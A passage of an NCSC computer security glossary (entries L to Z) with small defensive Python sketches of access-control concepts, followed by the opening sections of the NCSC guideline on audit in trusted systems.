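    return subject in acl.get(obj, [])
```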

lock-and-key protection system

	A protection system that involves matching a key or password with a
specific access requirement.
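
A lock-and-key check can be sketched as follows.  The use of a SHA-256 digest
and a constant-time comparison is an illustrative implementation choice, not
part of the definition.

```python
# Sketch of a lock-and-key protection check: a presented key (here, a
# password) must match the key stored for a specific access requirement.
# secrets.compare_digest avoids leaking match position through timing.
import hashlib
import secrets

stored_key = hashlib.sha256(b"opensesame").hexdigest()  # assumed secret

def unlock(presented: bytes) -> bool:
    """Match the presented key against the stored access requirement."""
    presented_key = hashlib.sha256(presented).hexdigest()
    return secrets.compare_digest(presented_key, stored_key)
```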

logic bomb

	A resident computer program that triggers the perpetration of an
unauthorized act when particular states of the system are realized.

loophole

	An error of omission or oversight in software or hardware that
permits circumventing the system security policy.  

-M-

magnetic remanence

	A measure of the magnetic flux density remaining after removal of
the applied magnetic force.  Refers to any data remaining on magnetic storage
media after removal of the power.

maintenance hook

	Special instructions in software to allow easy maintenance and
additional feature development.  These are typically not defined in the
design specification.  Hooks frequently allow entry into the code at
unusual points or without the usual checks, so they are a serious security
risk if they are not removed prior to live implementation.  Maintenance hooks
are special types of trap doors.

malicious logic

	Hardware, software, or firmware that is intentionally included in a
system for an unauthorized purpose; e.g., a Trojan horse.

mandatory access control (MAC)

	A means of restricting access to objects based on the sensitivity
(as represented by a label) of the information contained in the objects and
the formal authorization (i.e., clearance) of subjects to access information
of such sensitivity.  Compare discretionary access control.

masquerading

	Synonymous with spoofing.

mimicking

	Synonymous with spoofing.

modes of operation

	A description of the conditions under which an AIS functions, based
on the sensitivity of data processed and the clearance levels and
authorizations of the users.  Four modes of operation are authorized:

		(1)  Dedicated Mode
		An AIS is operating in the dedicated mode when each user
with direct or indirect individual access to the AIS, its peripherals, remote
terminals, or remote hosts, has all of the following: 
			a.  A valid personnel
clearance for all information on the system.
			b.  Formal access approval for, and has signed
nondisclosure agreements for all the information stored and/or processed
(including all compartments, subcompartments and/or special access programs).
			c.  A valid need-to-know for all information
contained within the system.

		(2)  System-High Mode
		An AIS is operating in the system-high mode when each user
with direct or indirect access to the AIS, its peripherals, remote terminals,
or remote hosts has all of the following:
			a.  A valid personnel clearance for all
information on the AIS.
			b.  Formal access approval for, and has signed
nondisclosure agreements for all the information stored and/or processed
(including all compartments, subcompartments, and/or special access programs).

			c.  A valid need-to-know for some of the
information contained within the AIS.

		(3)  Compartmented Mode
		An AIS is operating in the compartmented mode when each
user with direct or indirect access to the AIS, its peripherals, remote
terminals, or remote hosts, has all of the following:
			a.  A valid personnel clearance for the most
restricted information processed in the AIS.
			b.  Formal access approval for, and has signed
nondisclosure agreements for that information to which he/she is to have
access.
			c.  A valid need-to-know for that information to
which he/she is to have access.

		(4)  Multilevel Mode
		An AIS is operating in the multilevel mode when all the
following statements are satisfied concerning the users with direct or
indirect access to the AIS, its peripherals, remote terminals, or remote
hosts:
			a.  Some do not have a valid personnel clearance
for all the information processed in the AIS.
			b.  All have the proper clearance and have the
appropriate formal access approval for that information to which he/she is to
have access.
			c.  All have a valid need-to-know for that
information to which they are to have access.

multilevel device

	A device that is used in a manner that permits it to simultaneously
process data of two or more security levels without risk of compromise.  To
accomplish this, sensitivity labels are normally stored on the same physical
medium and in the same form (i.e., machine-readable or human-readable) as the
data being processed.

multilevel secure

	A class of system containing information with different
sensitivities that simultaneously permits access by users with different
security clearances and needs-to-know, but prevents users from obtaining
access to information for which they lack authorization.

multilevel security mode

	See modes of operation.

multiple access rights terminal

	A terminal that may be used by more than one class of users; for
example, users with different access rights to data.

multiuser mode of operation

	A mode of operation designed for systems that process sensitive
unclassified information in which users may not have a need-to-know for all
information processed in the system.  This mode is also for microcomputers
processing sensitive unclassified information that cannot meet the
requirements of the stand-alone mode of operation.

mutually suspicious

	The state that exists between interacting processes (subsystems or
programs) in which neither process can expect the other process to function
securely with respect to some property.

-N-

National Computer Security Assessment Program

	A program designed to evaluate the interrelationship of empirical
data of computer security infractions and critical systems profiles, while
comprehensively incorporating information from the CSTVRP.  The assessment
will build threat and vulnerability scenarios that are based on a collection
of facts from relevant reported cases.  Such scenarios are a powerful,
dramatic, and concise form of representing the value of loss experience
analysis.

National Computer Security Center (NCSC)

	Originally named the DoD Computer Security Center, the NCSC is
responsible for encouraging the widespread availability of trusted computer
systems throughout the Federal Government.

National Security Decision Directive 145 (NSDD 145)

	Signed by President Reagan on 17 September 1984, this directive is
entitled "National Policy on Telecommunications and Automated Information
Systems Security." It provides initial objectives, policies, and an
organizational structure to guide the conduct of national activities toward
safeguarding systems that process, store, or communicate sensitive
information; establishes a mechanism for policy development; and assigns
implementation responsibilities.

National Telecommunications and Information Systems Security Advisory
Memoranda/Instructions (NTISSAM, NTISSI)

	NTISS Advisory Memoranda and Instructions provide advice,
assistance, or information of general interest on telecommunications and
systems security to all applicable federal departments and agencies.
NTISSAMs/NTISSIs are promulgated by the National Manager for
Telecommunications and Automated Information Systems Security and are
recommendatory.

National Telecommunications and Information System Security Directives (NTISSD)

	NTISS Directives establish national-level decisions relating to
NTISS policies, plans, programs, systems, or organizational delegations of
authority.  NTISSDs are promulgated by the Executive Agent of the Government
for Telecommunications and Information Systems Security, or by the Chairman of
the NTISSC when so delegated by the Executive Agent.  NTISSDs are binding upon
all federal departments and agencies.

need-to-know

	The necessity for access to, knowledge of, or possession of specific
information required to carry out official duties.

network front end

	A device that implements the necessary network protocols, including
security-related protocols, to allow a computer system to be attached to a
network.

NSDD 145

 	See National Security Decision Directive 145.

-O-

object

	A passive entity that contains or receives information.  Access to
an object potentially implies access to the information it contains.  Examples
of objects are: records, blocks, pages, segments, files, directories,
directory trees, and programs, as well as bits, bytes, words, fields,
processors, video displays, keyboards, clocks, printers, and network nodes.

object reuse

	The reassignment and reuse of a storage medium (e.g., page frame,
disk sector, magnetic tape) that once contained one or more objects.  To be
securely reused and assigned to a new subject, storage media must contain no
residual data (magnetic remanence) from the object(s) previously contained in
the media.

open security environment

	An environment that includes those systems in which at least one of
the following conditions holds true: (1) Application developers (including
maintainers) do not have sufficient clearance or authorization to provide an
acceptable presumption that they have not introduced malicious logic.  (2)
Configuration control does not provide sufficient assurance that applications
are protected against the introduction of malicious logic prior to and during
the operation of system applications.

Operations Security (OPSEC)

	An analytical process by which the U.S.  Government and its
supporting contractors can deny to potential adversaries information about
capabilities and intentions by identifying, controlling, and protecting
evidence of the planning and execution of sensitive activities and operations.

Orange Book 

	Alternate name for DoD Trusted Computer System Evaluation
Criteria (TCSEC).

overt channel

	A path within a computer system or network that is designed for the
authorized transfer of data.  Compare covert channel.

overwrite procedure

	A procedure in which storage is overwritten with a known pattern of
bits in order to destroy previously recorded data.  See magnetic remanence.
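
An overwrite procedure can be sketched in miniature as follows; a real purge
would operate on the physical medium itself rather than on an in-memory copy.

```python
# Hedged sketch of an overwrite procedure: every byte of a buffer is
# replaced in place with a known pattern so the previous contents are
# no longer present in that copy.  The pattern value is an assumption.

def overwrite(buffer: bytearray, pattern: int = 0x00) -> None:
    """Overwrite every byte in place with a known pattern."""
    for i in range(len(buffer)):
        buffer[i] = pattern

data = bytearray(b"SECRET")
overwrite(data, 0xFF)
```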

-P-

partitioned security mode

	A mode of operation wherein all personnel have the clearance but not
necessarily formal access approval and need-to-know for all information
contained in the system.  Not to be confused with compartmented security mode.

password

	A protected/private character string used to authenticate an
identity.

penetration

	The successful act of bypassing the security mechanisms of a system.

penetration signature

	The characteristics or identifying marks that may be produced by a
penetration.

penetration study

	A study to determine the feasibility and methods for defeating
controls of a system.

penetration testing

	The portion of security testing in which the evaluators attempt to
circumvent the security features of a system.  The evaluators may be assumed
to use all system design and implementation documentation, which may include
listings of system source code, manuals, and circuit diagrams.  The evaluators
work under the same constraints applied to ordinary users.

periods processing

	The processing of various levels of sensitive information at
distinctly different times.  Under periods processing, the system must be
purged of all information from one processing period before transitioning to
the next when there are different users with differing authorizations.

permissions

	A description of the type of authorized interactions a subject can
have with an object.  Examples include: read, write, execute, add, modify, and
delete.

personnel security

	The procedures established to ensure that all personnel who have
access to sensitive information have the required authority as well as
appropriate clearances.

physical security

	The application of physical barriers and control procedures as
preventive measures or countermeasures against threats to resources and
sensitive information.

piggyback

	Gaining unauthorized access to a system via another user's
legitimate connection.  See between-the-lines entry.

Preferred Products List (PPL)

	A list of commercially produced equipments that meet TEMPEST and
other requirements prescribed by the National Security Agency.  This list is
included in the NSA Information Systems Security Products and Services
Catalogue, issued quarterly and available through the Government Printing
Office.

print suppression

 	Eliminating the displaying of characters in order to preserve their
secrecy; e.g., not displaying the characters of a password as it is keyed at
the input terminal.
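
As an example of print suppression in practice, Python's standard getpass
module reads a password without echoing the typed characters; the wrapper
function below is illustrative.

```python
# Print suppression as commonly implemented: getpass.getpass reads a
# line from the terminal without displaying the characters as they are
# keyed, preserving the secrecy of the password.
import getpass

def read_password(prompt: str = "Password: ") -> str:
    """Prompt for a password with character echo suppressed."""
    return getpass.getpass(prompt)
```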

privileged instructions

	A set of instructions (e.g., interrupt handling or special computer
instructions) to control features (such as storage protection features) that
are generally executable only when the automated system is operating in the
executive state.

procedural security

	Synonymous with administrative security.

process

 	 A program in execution. See domain and subject.

protection philosophy

	An informal description of the overall design of a system that
delineates each of the protection mechanisms employed.  A combination,
appropriate to the evaluation class, of formal and informal techniques is used
to show that the mechanisms are adequate to enforce the security policy.

protection ring

	One of a hierarchy of privileged modes of a system that gives
certain access rights to user programs and processes authorized to operate in
a given mode.

protection-critical portions of the TCB

	Those portions of the TCB whose normal function is to deal with the
control of access between subjects and objects.  Their correct operation is
essential to the protection of the data on the system.

protocols

	A set of rules and formats, semantic and syntactic, that permits
entities to exchange information.

pseudo-flaw

	An apparent loophole deliberately implanted in an operating system
program as a trap for intruders.

Public Law 100-235 (P.L. 100-235)

	Also known as the Computer Security Act of 1987, this law creates a
means for establishing minimum acceptable security practices for improving the
security and privacy of sensitive information in federal computer systems.
This law assigns to the National Institute of Standards and Technology
responsibility for developing standards and guidelines for federal computer
systems processing unclassified data.  The law also requires establishment of
security plans by all operators of federal computer systems that contain
sensitive information.

purge

	The removal of sensitive data from an AIS, AIS storage device, or
peripheral device with storage capacity, at the end of a processing period.
This action is performed in such a way that there is assurance proportional to
the sensitivity of the data that the data may not be reconstructed.  An AIS
must be disconnected from any external network before a purge.  After a purge,
the medium can be declassified by observing the review procedures of the
respective agency.

-Q-

This document contains no entries beginning with the letter Q.

-R-

read

	A fundamental operation that results only in the flow of information
from an object to a subject.

read access

	Permission to read information.

recovery procedures

	The actions necessary to restore a system's computational capability
and data files after a system failure.

reference monitor concept

	An access-control concept that refers to an abstract machine that
mediates all accesses to objects by subjects.
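
The mediation described above can be sketched as follows; the placeholder
policy and audit log are assumptions for illustration, not part of the
concept's definition.

```python
# Illustrative sketch of the reference monitor concept: every access by
# a subject to an object is routed through a single mediation function,
# which consults the security policy and records its decision.

AUDIT_LOG = []

def policy_allows(subject, obj, operation):
    # Placeholder policy: only "read" is authorized in this sketch.
    return operation == "read"

def reference_monitor(subject, obj, operation):
    """Mediate an access attempt and record the decision."""
    decision = policy_allows(subject, obj, operation)
    AUDIT_LOG.append((subject, obj, operation, decision))
    return decision
```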

reference validation mechanism

	An implementation of the reference monitor concept.  A security
kernel is a type of reference validation mechanism.

reliability

	The probability of a given system performing its mission adequately
for a specified period of time under the expected operating conditions.

residual risk

	The portion of risk that remains after security measures have been
applied.

residue

	Data left in storage after processing operations are complete, but
before degaussing or rewriting has taken place.

resource encapsulation

	The process of ensuring that a resource not be directly accessible
by a subject, but that it be protected so that the reference monitor can
properly mediate accesses to it.  

restricted area

	Any area to which access is subject to special restrictions or
controls for reasons of security or safeguarding of property or material.

risk

	The probability that a particular threat will exploit a particular
vulnerability of the system.

risk analysis

	The process of identifying security risks, determining their
magnitude, and identifying areas needing safeguards.  Risk analysis is a part
of risk management.  Synonymous with risk assessment.

risk assessment

  	 Synonymous with risk analysis.

risk index

	The disparity between the minimum clearance or authorization of
system users and the maximum sensitivity (e.g., classification and categories)
of data processed by a system.  See CSC-STD-003-85 and CSC-STD-004-85 for a
complete explanation of this term.

risk management

	The total process of identifying, controlling, and eliminating or
minimizing uncertain events that may affect system resources.  It includes
risk analysis, cost benefit analysis, selection, implementation and test,
security evaluation of safeguards, and overall security review.  

-S-

safeguards

	See security safeguards.

scavenging

	Searching through object residue to acquire unauthorized data.

secure configuration management

	The set of procedures appropriate for controlling changes to a
system's hardware and software structure for the purpose of ensuring that
changes will not lead to violations of the system's security policy.

secure state

	A condition in which no subject can access any object in an
unauthorized manner.

secure subsystem

	A subsystem that contains its own implementation of the reference
monitor concept for those resources it controls.  However, the secure
subsystem must depend on other controls and the base operating system for the
control of subjects and the more primitive system objects.

security critical mechanisms

	Those security mechanisms whose correct operation is necessary to
ensure that the security policy is enforced.

security evaluation

	An evaluation done to assess the degree of trust that can be placed
in systems for the secure handling of sensitive information.  One type, a
product evaluation, is an evaluation performed on the hardware and software
features and assurances of a computer product from a perspective that excludes
the application environment.  The other type, a system evaluation, is done for
the purpose of assessing a system's security safeguards with respect to a
specific operational mission and is a major step in the certification and
accreditation process.

security fault analysis

	A security analysis, usually performed on hardware at gate level, to
determine the security properties of a device when a hardware fault is
encountered.  

security features

	The security-relevant functions, mechanisms, and characteristics of
system hardware and software.  Security features are a subset of system
security safeguards.

security filter

	A trusted subsystem that enforces a security policy on the data that
pass through it.

security flaw

 	An error of commission or omission in a system that may allow
protection mechanisms to be bypassed.

security flow analysis

	A security analysis performed on a formal system specification that
locates potential flows of information within the system.

security kernel

	The hardware, firmware, and software elements of a TCB that
implement the reference monitor concept.  It must mediate all accesses, be
protected from modification, and be verifiable as correct.

security label

  	 A piece of information that represents the security level of an
object.

security level

	The combination of a hierarchical classification and a set of
nonhierarchical categories that represents the sensitivity of information.

security measures

	Elements of software, firmware, hardware, or procedures that are
included in a system for the satisfaction of security specifications.

security perimeter

	The boundary where security controls are in effect to protect
assets.

security policy

	The set of laws, rules, and practices that regulate how an
organization manages, protects, and distributes sensitive information.

security policy model

	A formal presentation of the security policy enforced by the system.
It must identify the set of rules and practices that regulate how a system
manages, protects, and distributes sensitive information.  See Bell-La Padula
model and formal security policy model.

security range

	The highest and lowest security levels that are permitted in or on a
system, system component, subsystem or network.

security requirements

	The types and levels of protection necessary for equipment, data,
information, applications, and facilities to meet security policy.

security requirements baseline

	A description of minimum requirements necessary for a system to
maintain an acceptable level of security.

security safeguards

	The protective measures and controls that are prescribed to meet the
security requirements specified for a system.  Those safeguards may include
but are not necessarily limited to: hardware and software security features,
operating procedures, accountability procedures, access and distribution
controls, management constraints, personnel security, and physical structures,
areas, and devices.  Also called safeguards.

security specifications

	A detailed description of the safeguards required to protect a
system.

security test and evaluation

	An examination and analysis of the security safeguards of a system
as they have been applied in an operational environment to determine the
security posture of the system.

security testing

	A process used to determine that the security features of a system
are implemented as designed.  This includes hands-on functional testing,
penetration testing, and verification.

sensitive information

	Any information the loss, misuse, or modification of which, or
unauthorized access to which, could affect the national interest or the
conduct of Federal
programs, or the privacy to which individuals are entitled under Section 552a
of Title 5, U.S.  Code, but that has not been specifically authorized under
criteria established by an Executive order or an act of Congress to be kept
classified in the interest of national defense or foreign policy.

sensitivity label

	A piece of information that represents the security level of an
object.  Sensitivity labels are used by the TCB as the basis for mandatory
access control decisions.

simple security condition

	See simple security property.

simple security property

	A Bell-La Padula security model rule allowing a subject read access
to an object only if the security level of the subject dominates the security
level of the object.  Synonymous with simple security condition.
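
The dominance check underlying this rule can be sketched as follows; the
classification values and category sets are illustrative.

```python
# Sketch of the simple security property ("no read up"): a subject may
# read an object only if the subject's security level dominates the
# object's.  A level dominates another when its hierarchical
# classification is at least as high and its category set is a superset.

LEVELS = {"UNCLASSIFIED": 0, "CONFIDENTIAL": 1, "SECRET": 2, "TOP SECRET": 3}

def dominates(a, b):
    """True if security level a dominates security level b."""
    (cls_a, cats_a), (cls_b, cats_b) = a, b
    return LEVELS[cls_a] >= LEVELS[cls_b] and cats_a >= cats_b

def may_read(subject_level, object_level):
    """Simple security property: read allowed only under dominance."""
    return dominates(subject_level, object_level)

secret_nato = ("SECRET", {"NATO"})
conf_plain = ("CONFIDENTIAL", set())
```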

single-level device

	An automated information systems device that is used to process data
of a single security level at any one time.

Software Development Methodologies

	Methodologies for specifying and verifying the design of programs for
system development.  Each methodology is written for a specific computer
language.  See Enhanced Hierarchical Development Methodology, Formal
Development Methodology, Gypsy Verification Environment and Hierarchical
Development Methodology.

software security

 	General purpose (executive, utility or software development tools)
and applications programs or routines that protect data handled by a system.

software system test and evaluation process

 	A process that plans, develops and documents the quantitative
demonstration of the fulfillment of all baseline functional performance,
operational and interface requirements.

spoofing

	An attempt to gain access to a system by posing as an authorized
user.  Synonymous with impersonating, masquerading, or mimicking.

stand-alone, shared system

	A system that is physically and electrically isolated from all other
systems, and is intended to be used by more than one person, either
simultaneously (e.g., a system with multiple terminals) or serially, with data
belonging to one user remaining available to the system while another user is
using the system (e.g., a personal computer with nonremovable storage media
such as a hard disk).

stand-alone, single-user system

	A system that is physically and electrically isolated from all other
systems, and is intended to be used by one person at a time, with no data
belonging to other users remaining in the system (e.g., a personal computer
with removable storage media such as a floppy disk).

star property 

	See *-property, page 2.

State Delta Verification System

	A system designed to give high confidence regarding microcode
performance by using formulae that represent isolated states of a computation
to check proofs concerning the course of that computation.

state variable

	A variable that represents either the state of the system or the
state of some system resource.

storage object

	An object that supports both read and write accesses.

Subcommittee on Automated Information Systems Security (SAISS)

	NSDD-145 authorizes and directs the establishment, under the NTISSC,
of a permanent Subcommittee on Automated Information Systems Security.  The
SAISS is composed of one voting member from each organization represented on
the NTISSC.

Subcommittee on Telecommunications Security (STS)

	NSDD-145 authorizes and directs the establishment, under the NTISSC,
of a permanent Subcommittee on Telecommunications Security.  The STS is
composed of one voting member from each organization represented on the
NTISSC.

subject

	An active entity, generally in the form of a person, process, or
device, that causes information to flow among objects or changes the system
state.  Technically, a process/domain pair.

subject security level

	A subject's security level is equal to the security level of the
objects to which it has both read and write access.  A subject's security
level must always be dominated by the clearance of the user with which the
subject is associated.

supervisor state

	Synonymous with executive state.

System Development Methodologies

 	Methodologies developed through software engineering to manage the
complexity of system development.  Development methodologies include software
engineering aids and high-level design analysis tools.

system high security mode

	See modes of operation.

system integrity

	The quality that a system has when it performs its intended function
in an unimpaired manner, free from deliberate or inadvertent unauthorized
manipulation of the system.

system low

	The lowest security level supported by a system at a particular time
or in a particular environment.

System Security Officer (SSO)

	See Information System Security Officer. 

Systems Security Steering Group

	The senior government body established by NSDD-145 to provide
top-level review and policy guidance for the telecommunications security and
automated information systems security activities of the U.S.  Government.
This group is chaired by the Assistant to the President for National Security
Affairs and consists of the Secretary of State, Secretary of Treasury, the
Secretary of Defense, the Attorney General, the Director of the Office of
Management and Budget, and the Director of Central Intelligence.

-T-

tampering

	An unauthorized modification that alters the proper functioning of
an equipment or system in a manner that degrades the security or functionality
it provides.

technical attack

	An attack that can be perpetrated by circumventing or nullifying
hardware and software protection mechanisms, rather than by subverting system
personnel or other users.

technical vulnerability

	A hardware, firmware, communication, or software flaw that leaves a
computer processing system open for potential exploitation, either externally
or internally, thereby resulting in risk for the owner, user, or manager of
the system.

TEMPEST

	The study and control of spurious electronic signals emitted by
electrical equipment.

terminal identification

	The means used to uniquely identify a terminal to a system.

threat

	Any circumstance or event with the potential to cause harm to a
system in the form of destruction, disclosure, modification of data, and/or
denial of service.

threat agent

	A method used to exploit a vulnerability in a system, operation, or
facility.

threat analysis

	The examination of all actions and events that might adversely
affect a system or operation.

threat monitoring

	The analysis, assessment, and review of audit trails and other data
collected for the purpose of searching out system events that may constitute
violations or attempted violations of system security.

ticket-oriented

	A computer protection system in which each subject maintains a list
of unforgeable bit patterns, called tickets, one for each object the subject
is authorized to access.  Compare list-oriented.
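As an illustrative sketch (not part of the glossary), a ticket check can be modeled with a keyed hash standing in for unforgeability; real ticket-oriented systems enforce this in hardware or within the TCB, and all names below are hypothetical:

```python
# Sketch of a ticket-oriented protection check: each subject holds
# unforgeable bit patterns (tickets), one per object it may access.
# An HMAC under a key known only to the TCB stands in for
# unforgeability in this model.
import hashlib
import hmac

TCB_KEY = b"key-held-only-by-the-TCB"  # hypothetical secret

def mint_ticket(subject, obj, mode):
    """Issued by the TCB: a bit pattern the subject cannot forge."""
    msg = f"{subject}:{obj}:{mode}".encode()
    return hmac.new(TCB_KEY, msg, hashlib.sha256).hexdigest()

def check_ticket(subject, obj, mode, ticket):
    """Reference check: recompute the pattern and compare in
    constant time."""
    return hmac.compare_digest(ticket, mint_ticket(subject, obj, mode))

t = mint_ticket("john", "reactor-file", "read")
print(check_ticket("john", "reactor-file", "read", t))    # True
print(check_ticket("john", "reactor-file", "write", t))   # False: wrong mode
```

In contrast, a list-oriented system would attach the access list to the object rather than handing tickets to subjects.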

time-dependent password

	A password that is valid only at a certain time of day or during a
specified interval of time.

top-level specification

	A nonprocedural description of system behavior at the most abstract
level; typically, a functional specification that omits all implementation
details.

tranquility

	A security model rule stating that the security level of an object
cannot change while the object is being processed by an AIS.

trap door

	A hidden software or hardware mechanism that can be triggered to
permit system protection mechanisms to be circumvented.  It is activated in
some innocent-appearing manner; e.g., a special "random" key sequence at a
terminal.  Software developers often introduce trap doors in their code to
enable them to reenter the system and perform certain functions.  Synonymous
with back door.

Trojan horse

	A computer program with an apparently or actually useful function
that contains additional (hidden) functions that surreptitiously exploit the
legitimate authorizations of the invoking process to the detriment of security
or integrity.

trusted computer system

	A system that employs sufficient hardware and software assurance
measures to allow its use for simultaneous processing of a range of sensitive
or classified information.

Trusted Computing Base (TCB)

	The totality of protection mechanisms within a computer system,
including hardware, firmware, and software, the combination of which is
responsible for enforcing a security policy.  A TCB consists of one or more
components that together enforce a unified security policy over a product or
system.  The ability of a TCB to enforce correctly a unified security policy
depends solely on the mechanisms within the TCB and on the correct input by
system administrative personnel of parameters (e.g., a user's clearance level)
related to the security policy.

trusted distribution

 	 A trusted method for distributing the TCB hardware, software, and
firmware components, both originals and updates, that provides methods for
protecting the TCB from modification during distribution and for detection of
any changes to the TCB that may occur.

trusted identification forwarding

	An identification method used in networks whereby the sending host
can verify that an authorized user on its system is attempting a connection to
another host.  The sending host transmits the required user authentication
information to the receiving host.  The receiving host can then verify that
the user is validated for access to its system.  This operation may be
transparent to the user.

trusted path

 	 A mechanism by which a person at a terminal can communicate
directly with the TCB.  This mechanism can only be activated by the person or
the TCB and cannot be imitated by untrusted software.

trusted process

	A process whose incorrect or malicious execution is capable of
violating system security policy.

trusted software

	The software portion of the TCB. 

-U-

untrusted process

	A process that has not been evaluated or examined for adherence to
the security policy.  It may include incorrect or malicious code that attempts
to circumvent the security mechanisms.

user

	Person or process accessing an AIS either by direct connections
(i.e., via terminals), or indirect connections (i.e., prepare input data or
receive output that is not reviewed for content or classification by a
responsible individual).

user ID

	A unique symbol or character string that is used by a system to
identify a specific user.

user profile

	Patterns of a user's activity that can be used to detect changes in
normal routines.  

-V-

verification

	The process of comparing two levels of system specification for
proper correspondence (e.g., security policy model with top-level
specification, top-level specification with source code, or source code with
object code).  This process may or may not be automated.

virus

	A self-propagating Trojan horse, composed of a mission component, a
trigger component, and a self-propagating component.

vulnerability

	A weakness in system security procedures, system design,
implementation, internal controls, etc., that could be exploited to violate
system security policy.

vulnerability analysis

	The systematic examination of systems in order to determine the
adequacy of security measures, identify security deficiencies, and provide
data from which to predict the effectiveness of proposed security measures.

vulnerability assessment

 	A measurement of vulnerability which includes the susceptibility of
a particular system to a specific attack and the opportunities available to a
threat agent to mount that attack.  

-W-

work factor

	An estimate of the effort or time needed by a potential penetrator
with specified expertise and resources to overcome a protective measure.

write

	A fundamental operation that results only in the flow of information
from a subject to an object.

write access

	Permission to write to an object.

-X,Y,Z-

This document contains no entries beginning with the letters  X, Y, or Z.

The Tan Book: A Guide to Understanding Audit in Trusted Systems

 

                                              NCSC-TG-001 
                                         Library No. S-228,470 

                          FOREWORD 

This publication, "A Guide to Understanding Audit in Trusted 
Systems," is being issued by the National Computer Security 
Center (NCSC) under the authority of and in accordance with 
Department of Defense (DoD) Directive 5215.1.  The guidelines 
described in this document provide a set of good practices 
related to the use of auditing in automatic data processing 
systems employed for processing classified and other sensitive 
information. Recommendations for revision to this guideline are 
encouraged and will be reviewed biannually by the National 
Computer Security Center through a formal review process.  
Address all proposals for revision through appropriate channels 
to:  

       National Computer Security Center 
       9800 Savage Road 
       Fort George G. Meade, MD  20755-6000  

       Attention: Chief, Computer Security Technical Guidelines 

_________________________________ 
Patrick R. Gallagher, Jr.                     28 July 1987 
Director 
National Computer Security Center  

                          ACKNOWLEDGEMENTS 

Special recognition is extended to James N. Menendez, National 
Computer Security Center (NCSC), as project manager of the 
preparation and production of this document. 

Acknowledgement is also given to the NCSC Product Evaluations 
Team who provided the technical guidance that helped form this 
document and to those members of the computer security community 
who contributed their time and expertise by actively
participating in the review of this document. 

                          CONTENTS 

FOREWORD ...................................................  i 

ACKNOWLEDGEMENTS ...........................................  ii 

CONTENTS ...................................................  iii

PREFACE .....................................................  v 

1. INTRODUCTION .............................................  1 

    1.1 HISTORY OF THE NATIONAL COMPUTER SECURITY CENTER ....  1 
    1.2 GOAL OF THE NATIONAL COMPUTER SECURITY CENTER .......  1 

2. PURPOSE ..................................................  2 

3. SCOPE ....................................................  3 

4. CONTROL OBJECTIVES .......................................  4 

5. OVERVIEW OF AUDITING PRINCIPLES ..........................  8 

    5.1 PURPOSE OF THE AUDIT MECHANISM.......................  8 
    5.2 USERS OF THE AUDIT MECHANISM.........................  8 
    5.3 ASPECTS OF EFFECTIVE AUDITING .......................  9 

         5.3.1 Identification/Authentication ................  9 
         5.3.2 Administrative ...............................  10
         5.3.3 System Design ................................  10

    5.4 SECURITY OF THE AUDIT ...............................  10 

6. MEETING THE CRITERIA REQUIREMENTS ........................  12

    6.1 THE C2 AUDIT REQUIREMENT ............................  12

         6.1.1 Auditable Events .............................  12
         6.1.2 Auditable Information ........................  12
         6.1.3 Audit Basis ..................................  13

    6.2 THE B1 AUDIT REQUIREMENT ............................  13

         6.2.1 Auditable Events .............................  13
         6.2.2 Auditable Information ........................  13
         6.2.3 Audit Basis ..................................  14

    6.3 THE B2 AUDIT REQUIREMENT ............................  14

         6.3.1 Auditable Events .............................  14
         6.3.2 Auditable Information ........................  14
         6.3.3 Audit Basis ..................................  14

    6.4 THE B3 AUDIT REQUIREMENT ............................  15

         6.4.1 Auditable Events .............................  15
         6.4.2 Auditable Information ........................  15
         6.4.3 Audit Basis ..................................  15

    6.5 THE A1 AUDIT REQUIREMENT ............................  16

         6.5.1 Auditable Events .............................  16
         6.5.2 Auditable Information ........................  16
         6.5.3 Audit Basis ..................................  16 

7. POSSIBLE IMPLEMENTATION METHODS ..........................  17

    7.1 PRE/POST SELECTION OF AUDITABLE EVENTS ..............  17 

         7.1.1 Pre-Selection ................................  17
         7.1.2 Post-Selection ...............................  18

    7.2 DATA COMPRESSION ....................................  18
    7.3 MULTIPLE AUDIT TRAILS ...............................  19
    7.4 PHYSICAL STORAGE ....................................  19
    7.5 WRITE-ONCE DEVICE ...................................  20
    7.6 FORWARDING AUDIT DATA ...............................  21

8. OTHER TOPICS .............................................  22

    8.1 AUDIT DATA REDUCTION ................................  22
    8.2 AVAILABILITY OF AUDIT DATA ..........................  22
    8.3 AUDIT DATA RETENTION ................................  22
    8.4 TESTING .............................................  23
    8.5 DOCUMENTATION .......................................  23
    8.6 UNAVOIDABLE SECURITY RISKS ..........................  24

         8.6.1 Auditing Administrators/Insider Threat .......  24 
         8.6.2 Data Loss ....................................  25

9. AUDIT SUMMARY ...........................................  26 

GLOSSARY

REFERENCES ..............................................  27 

                          PREFACE                

Throughout this guideline there will be recommendations made that
are not included in the Trusted Computer System Evaluation 
Criteria (the Criteria) as requirements.  Any recommendations 
that are not in the Criteria will be prefaced by the word 
"should," whereas all requirements will be prefaced by the word 
"shall."  It is hoped that this will help to avoid any confusion.


1.   INTRODUCTION 

1.1   History of the National Computer Security Center 

The DoD Computer Security Center (DoDCSC) was established in 
January 1981 for the purpose of expanding on the work started by 
the DoD Security Initiative.  Accordingly, the Director, National
Computer Security Center, has the responsibility for establishing
and publishing standards and guidelines for all areas of computer
security.  In 1985, DoDCSC's name was changed to the National 
Computer Security Center to reflect its responsibility for 
computer security throughout the federal government. 

1.2   Goal of the National Computer Security Center 

The main goal of the National Computer Security Center is to 
encourage the widespread availability of trusted computer 
systems.  In support of that goal a metric was created, the DoD 
Trusted Computer System Evaluation Criteria (the Criteria), 
against which computer systems could be evaluated for security.  
The Criteria was originally published on 15 August 1983 as CSC- 
STD-001-83.  In December 1985 the DoD adopted it, with a few 
changes, as a DoD Standard, DoD 5200.28-STD.  DoD Directive 
5200.28, "Security Requirements for Automatic Data Processing 
(ADP) Systems" has been written to, among other things, require 
the Department of Defense Trusted Computer System Evaluation 
Criteria to be used throughout the DoD.  The Criteria is the 
standard used for evaluating the effectiveness of security 
controls built into ADP systems.  The Criteria is divided into 
four divisions: D, C, B, and A, ordered in a hierarchical manner 
with the highest division (A) being reserved for systems 
providing the best available level of assurance.  Within 
divisions C and B there are a number of subdivisions known as 
classes, which are also ordered in a hierarchical manner to 
represent different levels of security in these classes.   

2.   PURPOSE 

For Criteria classes C2 through A1 the Criteria requires that a 
user's actions be open to scrutiny by means of an audit.  The 
audit process of a secure system is the process of recording, 
examining, and reviewing any or all security-relevant activities 
on the system.  This guideline is intended to discuss issues 
involved in implementing and evaluating an audit mechanism.  The 
purpose of this document is twofold.  It provides guidance to 
manufacturers on how to design and incorporate an effective audit
mechanism into their system, and it provides guidance to 
implementors on how to make effective use of the audit
capabilities provided by trusted systems.  This document contains
suggestions as to what information should be recorded on the 
